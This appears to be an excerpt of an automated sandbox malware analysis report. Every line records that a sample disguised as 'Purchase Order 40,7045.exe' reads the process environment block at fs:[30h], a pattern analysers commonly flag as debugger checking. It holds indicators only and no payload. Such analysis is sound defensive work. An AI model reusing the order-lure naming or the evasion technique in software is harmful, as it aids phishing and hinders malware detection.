Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01210050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01210050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012390AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01273884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01273884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01223B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01223B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01201B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01201B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01234A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01234A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01208A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01213A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0123927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01284257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0127A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01233D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01273540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01217D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012235A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01221DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01221DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01221DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
